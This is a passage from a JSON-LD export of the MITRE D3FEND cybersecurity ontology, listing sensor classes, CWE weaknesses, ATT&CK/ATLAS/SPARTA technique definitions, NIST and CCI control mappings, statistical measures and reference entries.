        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:FileSystemSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Collects files and file metadata on an endpoint.",
      "d3f:monitors": {
        "@id": "d3f:File"
      },
      "rdfs:label": "File System Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "_:N79d097b794f345ac8c9b646a270e247b"
        }
      ]
    },
    {
      "@id": "_:N79d097b794f345ac8c9b646a270e247b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:DE-0009.05",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009.05",
      "d3f:definition": "The adversary targets terrestrial space-domain awareness pipelines, sensor networks, tracking centers, catalogs, and their data flows, to blind or confuse broad-area monitoring. Paths include compromising or spoofing observational feeds (radar/optical returns, TLE updates, ephemeris exchanges), injecting falsified or time-shifted tracks, tampering with fusion/association parameters, and saturating ingestion and alerting with noisy or adversarial inputs. Where SDA employs AI/ML for detection and correlation, the attacker can degrade models by flooding them with ambiguous scenes or crafted features that increase false positives/negatives and consume analyst cycles. Unlike onboard deception, this approach skews the external decision-support picture across many assets at once, delaying detection of real maneuvers and providing cover for concurrent operations.",
      "rdfs:label": "Corruption or Overload of Ground-Based SDA Systems - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/05/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0009"
      },
      "skos:prefLabel": "Corruption or Overload of Ground-Based SDA Systems"
    },
    {
      "@id": "d3f:T1553.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1553.001",
      "d3f:definition": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Gatekeeper Bypass",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1553"
        },
        {
          "@id": "_:N00eca59a3cb248819e7d25350cb97045"
        }
      ]
    },
    {
      "@id": "_:N00eca59a3cb248819e7d25350cb97045",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:T1556.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.005",
      "d3f:definition": "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)",
      "rdfs:label": "Reversible Encryption",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:CWE-226",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-226",
      "d3f:definition": "The product releases a resource such as memory or a file so that it can be made available for reuse, but it does not clear or \"zeroize\" the information contained in the resource before the product performs a critical state transition or makes the resource available for reuse by other entities.",
      "rdfs:label": "Sensitive Information in Resource Not Removed Before Reuse",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-212"
        },
        {
          "@id": "d3f:CWE-459"
        }
      ]
    },
    {
      "@id": "d3f:CustomArchiveFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A custom archive file is an archive file conforming to a custom format; that is, an archive file that does not conform to a common standard.",
      "rdfs:label": "Custom Archive File",
      "rdfs:subClassOf": {
        "@id": "d3f:ArchiveFile"
      }
    },
    {
      "@id": "d3f:CWE-64",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-64",
      "d3f:definition": "The product, when opening a file or directory, does not sufficiently handle when the file is a Windows shortcut (.LNK) whose target is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.",
      "d3f:synonym": [
        "Windows symbolic link following",
        "symlink"
      ],
      "rdfs:label": "Windows Shortcut Following (.LNK)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-59"
      }
    },
    {
      "@id": "d3f:CCI-001096_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system limits the use of resources by priority.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001096"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_29",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Filter Orchestration Engines",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(29)"
    },
    {
      "@id": "d3f:CWE-580",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-580",
      "d3f:definition": "The product contains a clone() method that does not call super.clone() to obtain the new object.",
      "rdfs:label": "clone() Method Without super.clone()",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-664"
        }
      ]
    },
    {
      "@id": "d3f:T1632.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1632.001",
      "d3f:definition": "Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys. Code signing provides a level of authenticity on an app from a developer, guaranteeing that the program has not been tampered with and comes from an official source. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on a device.",
      "rdfs:label": "Code Signing Policy Modification - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1632"
      },
      "skos:prefLabel": "Code Signing Policy Modification"
    },
    {
      "@id": "d3f:ROM",
      "@type": "owl:Class",
      "d3f:definition": "Read-only memory (ROM) is a type of non-volatile memory used in computers and other electronic devices. Data stored in ROM cannot be electronically modified after the manufacture of the memory device. Read-only memory is useful for storing software that is rarely changed during the life of the system, also known as firmware.",
      "d3f:synonym": "Read-only Memory",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Read-only_memory"
      },
      "rdfs:label": "ROM",
      "rdfs:subClassOf": {
        "@id": "d3f:PrimaryStorage"
      }
    },
    {
      "@id": "d3f:AudioInputDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Audio input devices allow a user to send audio info to a computer for processing, recording, or carrying out commands. Devices such as microphones allow users to speak to the computer in order to record a voice message or navigate software. Aside from recording, audio input devices are also used with speech recognition software.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Input_device#Voice_input_devices"
      },
      "rdfs:label": "Audio Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "d3f:GoodmanAndKruskalsGamma",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GAKG",
      "d3f:definition": "Goodman-Kruskal $\\\\gamma$ is a measure of rank correlation between x and y and is given by $(n_c -n_d) / (n_c + n_d)$, where $n_c$ is the number of concordant pairs of the observations and $n_d$ is the number of discordant pairs.",
      "d3f:kb-article": "## References\n1. Wolfram Research. (2012). GoodmanKruskalGamma. Wolfram Language function.  [Link](https://reference.wolfram.com/language/ref/GoodmanKruskalGamma.html)\n1. Goodman and Kruskal's gamma. (2022, Nov 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Goodman_and_Kruskal%27s_gamma]",
      "rdfs:isDefinedBy": {
        "@id": "https://reference.wolfram.com/language/ref/GoodmanKruskalGamma.html"
      },
      "rdfs:label": "Goodman and Kruskal's Gamma",
      "rdfs:subClassOf": {
        "@id": "d3f:RankCorrelationCoefficient"
      }
    },
    {
      "@id": "d3f:SystemTimeApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system time utility is utility software that can get the system time, such as the Unix date command or Windows' Net utility.",
      "d3f:reads": {
        "@id": "d3f:SystemTime"
      },
      "rdfs:label": "System Time Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UtilitySoftware"
        },
        {
          "@id": "_:Nc80cf127993a47e2bbe1baa6104a5194"
        }
      ]
    },
    {
      "@id": "_:Nc80cf127993a47e2bbe1baa6104a5194",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemTime"
      }
    },
    {
      "@id": "d3f:M1043",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "rdfs:label": "Credential Access Protection"
    },
    {
      "@id": "d3f:LuaScriptFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Lua Script File"
    },
    {
      "@id": "d3f:T1589.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1589.003",
      "d3f:definition": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.",
      "rdfs:label": "Employee Names",
      "rdfs:subClassOf": {
        "@id": "d3f:T1589"
      }
    },
    {
      "@id": "d3f:OTDeviceIdentificationMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "Identify devices on the network.",
      "rdfs:label": "OT Device Identification Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceManagementMessageEvent"
        },
        {
          "@id": "_:N3ebbab85c900463596e586e5367f118d"
        }
      ]
    },
    {
      "@id": "_:N3ebbab85c900463596e586e5367f118d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceIdentificationMessage"
      }
    },
    {
      "@id": "d3f:HardwareClockEvent",
      "@type": "owl:Class",
      "d3f:definition": "A clock event involving a physical timekeeping mechanism implemented in hardware components.",
      "rdfs:label": "Hardware Clock Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ClockEvent"
        },
        {
          "@id": "_:N6230251b318f442282c63dcf3b7eb382"
        }
      ]
    },
    {
      "@id": "_:N6230251b318f442282c63dcf3b7eb382",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareClock"
      }
    },
    {
      "@id": "d3f:ContentRebuild",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentRebuild"
      ],
      "d3f:d3fend-id": "D3-CNR",
      "d3f:definition": "Rebuild the file according to the spec so any unreferenced components or objects are removed.",
      "d3f:kb-article": "## How it works\n\nIf inputted content is divided up into components for further scrutiny, the components may be combined back afterwards in a safer state.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "d3f:synonym": "Content Reconstruction",
      "rdfs:label": "Content Rebuild",
      "rdfs:subClassOf": {
        "@id": "d3f:ContentModification"
      }
    },
    {
      "@id": "d3f:T1098",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1098",
      "d3f:definition": "Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.",
      "d3f:modifies": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Account Manipulation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        },
        {
          "@id": "_:Nc0ee703e7c3346fdaa894d57891fcd7c"
        }
      ]
    },
    {
      "@id": "_:Nc0ee703e7c3346fdaa894d57891fcd7c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1139",
      "@type": "owl:Class",
      "d3f:attack-id": "T1139",
      "d3f:definition": "Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1552.003",
      "rdfs:label": "Bash History",
      "rdfs:seeAlso": {
        "@id": "d3f:T1552.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:NetworkTrafficAnalysisSoftware",
      "@type": "owl:Class",
      "d3f:definition": "A packet analyzer, also known as packet sniffer, protocol analyzer, or network analyzer, is a computer program or computer hardware such as a packet capture appliance, that can intercept and log traffic that passes over a computer network or part of a network.\"",
      "d3f:synonym": "Network Sniffer",
      "rdfs:label": "Network Traffic Analysis Software",
      "rdfs:subClassOf": {
        "@id": "d3f:DeveloperApplication"
      }
    },
    {
      "@id": "d3f:Reference-DaggerFactSheet",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.jhuapl.edu/dagger/documents/DaggerFactSheet.pdf"
      },
      "d3f:kb-abstract": "Dagger is a modeling and visualization tool suite that shows how system failures impact mission status. Updated with manual or real-time status, Dagger is used for mission/system planning, situational awareness during mission execution, and course-of-action analysis.",
      "d3f:kb-author": "Jackie Soenneker",
      "d3f:kb-organization": "JHU APL",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalDependencyMapping"
      },
      "d3f:kb-reference-title": "Dagger Fact Sheet",
      "rdfs:label": "Reference - Dagger Fact Sheet"
    },
    {
      "@id": "d3f:CWE-1094",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1094",
      "d3f:definition": "The product contains an index range scan for a large data table, but the scan can cover a large number of rows.",
      "rdfs:label": "Excessive Index Range Scan for a Data Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:T1584",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584",
      "d3f:definition": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.",
      "rdfs:label": "Compromise Infrastructure",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:encodes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x encodes y: The entity x transforms data y to a different form, usually through compression.",
      "rdfs:label": "encodes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-616",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-616",
      "d3f:definition": "The PHP application uses an old method for processing uploaded files by referencing the four global variables that are set for each file (e.g. $varname, $varname_size, $varname_name, $varname_type). These variables could be overwritten by attackers, causing the application to process unauthorized files.",
      "rdfs:label": "Incomplete Identification of Uploaded File Variables (PHP)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:Reference-AutomaticallyGeneratingNetworkResourceGroupsAndAssigningCustomizedDecoyPoliciesThereto_IllusiveNetworksLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170310689A1"
      },
      "d3f:kb-abstract": "A cyber security system comprising circuitry of a decoy deployer planting one or more decoy lateral attack vectors in each of a first and a second group of resources within a common enterprise network of resources, the first and second groups of resources having different characteristics in terms of subnets, naming conventions, DNS aliases, listening ports, users and their privileges, and installed applications, wherein a lateral attack vector is an object of a first resource within the network that has a potential to be used by an attacker who discovered the first resource to further discover information regarding a second resource within the network, the second resource being previously undiscovered by the attacker, and wherein the decoy lateral attack vectors in the first group conform to the characteristics of the first group, and the decoy lateral attack vectors in the second group conform to the characteristics of the second group.",
      "d3f:kb-author": "Shlomo Touboul; Hanan Levin; Stephane Roubach; Assaf Mischari; Itai Ben David; Itay Avraham; Adi Ozer; Chen Kazaz; Ofer Israeli; Olga Vingurt; Liad Gareh; Israel Grimberg; Cobby Cohen; Sharon Sultan; Matan Kubovsky",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Illusive Networks Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyNetworkResource"
      },
      "d3f:kb-reference-title": "Automatically generating network resource groups and assigning customized decoy policies thereto",
      "rdfs:label": "Reference - Automatically generating network resource groups and assigning customized decoy policies thereto - Illusive Networks Ltd"
    },
    {
      "@id": "d3f:kb-organization",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x kb-organization y: The reference x was created or owned by the organization y.",
      "rdfs:label": "kb-organization",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-annotation-property"
      }
    },
    {
      "@id": "d3f:AML.TA0012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0012",
      "d3f:definition": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:\n- SYSTEM/root level\n- local administrator\n- user account with admin-like access\n- user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.",
      "rdfs:label": "Privilege Escalation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0012"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Privilege Escalation"
    },
    {
      "@id": "d3f:T1036.009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036.009",
      "d3f:definition": "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child\" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022)",
      "rdfs:label": "Break Process Trees",
      "rdfs:subClassOf": {
        "@id": "d3f:T1036"
      }
    },
    {
      "@id": "d3f:LegacySystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a legacy system is an old method, technology, computer system, or application program, \"of, relating to, or being a previous or outdated computer system,\" yet still in use. Often referencing a system as \"legacy\" means that it paved the way for the standards that would follow it. This can also imply that the system is out of date or in need of replacement.",
      "d3f:synonym": "Legacy Digital System",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Legacy_system"
      },
      "rdfs:label": "Legacy System",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalSystem"
      }
    },
    {
      "@id": "d3f:T1447",
      "@type": "owl:Class",
      "d3f:attack-id": "T1447",
      "d3f:definition": "Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. (Citation: Android DevicePolicyManager 2019)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1630.002",
      "rdfs:label": "Delete Device Data - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1630.002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        }
      ],
      "skos:prefLabel": "Delete Device Data"
    },
    {
      "@id": "d3f:AML.T0036",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0036",
      "d3f:definition": "Adversaries may leverage information repositories to mine valuable information.\nInformation repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nInformation stored in a repository may vary based on the specific instance or environment.\nSpecific common information repositories include SharePoint, Confluence, and enterprise databases such as SQL Server.",
      "rdfs:label": "Data from Information Repositories - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0036"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCollectionTechnique"
      },
      "skos:prefLabel": "Data from Information Repositories"
    },
    {
      "@id": "d3f:T1194",
      "@type": "owl:Class",
      "d3f:attack-id": "T1194",
      "d3f:definition": "Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1566.003",
      "rdfs:label": "Spearphishing via Service",
      "rdfs:seeAlso": {
        "@id": "d3f:T1566.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:InitialAccessTechnique"
      }
    },
    {
      "@id": "d3f:DigitalDocument",
      "@type": "owl:Class",
      "d3f:definition": "An digital document is any electronic media content (other than computer programs or system files) that is intended to be used in either an electronic form or as printed output.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Electronic_document",
      "rdfs:label": "Digital Document",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:UserToUserMessage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Personal message, private message (PM), direct message (DM), or personal chat (PC) is a private form of messaging between different members on a given platform. It is only seen and accessible by the users participating in the message.",
      "d3f:has-recipient": {
        "@id": "d3f:UserAccount"
      },
      "d3f:has-sender": {
        "@id": "d3f:UserAccount"
      },
      "d3f:may-contain": {
        "@id": "d3f:Email"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Personal_message"
      },
      "rdfs:label": "User to User Message",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalMessage"
        },
        {
          "@id": "_:N137ca8f7c5f04b479a63e824f65fc0ba"
        },
        {
          "@id": "_:N1789a6c0807e4dcf9cd82a5547913e9e"
        },
        {
          "@id": "_:N7a9e67c1d1534085bcc9fd7acfea239f"
        }
      ],
      "skos:altLabel": [
        "Personal Message",
        "Private Message"
      ]
    },
    {
      "@id": "_:N137ca8f7c5f04b479a63e824f65fc0ba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-recipient"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:N1789a6c0807e4dcf9cd82a5547913e9e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-sender"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:N7a9e67c1d1534085bcc9fd7acfea239f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:CoefficientOfVariation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-COV",
      "d3f:definition": "The coefficient of variation (CV), also known as relative standard deviation (RSD), is a standardized measure of dispersion of a probability distribution or frequency distribution.\n\nThe coefficient of variation (CV) is defined as the ratio of the standard deviation to the mean .",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Coefficient of variation. [Link](https://en.wikipedia.org/wiki/Coefficient_of_variation)",
      "d3f:synonym": [
        "RSD",
        "Relative Standard Deviation"
      ],
      "rdfs:label": "Coefficient of Variation",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:CWE-76",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-76",
      "d3f:definition": "The product correctly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.",
      "rdfs:label": "Improper Neutralization of Equivalent Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-75"
      }
    },
    {
      "@id": "d3f:MemoryWriteEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process writes data to a memory address, storing new information or updating existing content.",
      "rdfs:label": "Memory Write Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryEvent"
        },
        {
          "@id": "_:Nfabd3c0afef04f5a9ab5cf05f001f878"
        }
      ]
    },
    {
      "@id": "_:Nfabd3c0afef04f5a9ab5cf05f001f878",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:LogististicRegressionLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LRL",
      "d3f:definition": "A supervised learning method that builds a logistic regression model using training data.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Logistic regression. [Link](https://en.wikipedia.org/wiki/Logistic_regression)",
      "rdfs:label": "Logistic Regression Learning",
      "rdfs:seeAlso": {
        "@id": "d3f:LogisticRegression"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:CCI-001178_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides additional data origin authentication artifacts along with the authoritative name resolution data the system returns in response to external name/address resolution queries.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001178"
    },
    {
      "@id": "d3f:Telecommand",
      "@type": "owl:Class",
      "d3f:definition": "A telecommand or telecontrol is a command sent to control a remote system or systems not directly connected (e.g. via wires) to the place from which the telecommand is sent.",
      "d3f:synonym": "Remote Control Command",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Telecommand"
      },
      "rdfs:label": "Telecommand",
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteCommand"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:control-name": "Separation of Duties",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-5"
    },
    {
      "@id": "d3f:T0823",
      "@type": "owl:Class",
      "d3f:attack-id": "T0823",
      "d3f:definition": "Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard.",
      "rdfs:label": "Graphical User Interface - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Graphical User Interface"
    },
    {
      "@id": "d3f:enabled-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x enabled-by y: A top level technique y enables a tactic x, that is, the property indicates that a technique y is used to put a particular tactic x into action. In other words, y renders x capable or able for some task.  Inverse of enables.",
      "owl:inverseOf": {
        "@id": "d3f:enables"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00513958-v"
      },
      "rdfs:label": "enabled-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:OSAPISuspendThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that pauses the execution of a thread.",
      "d3f:invokes": {
        "@id": "d3f:SuspendThread"
      },
      "rdfs:label": "OS API Suspend Thread",
      "rdfs:subClassOf": [
        {
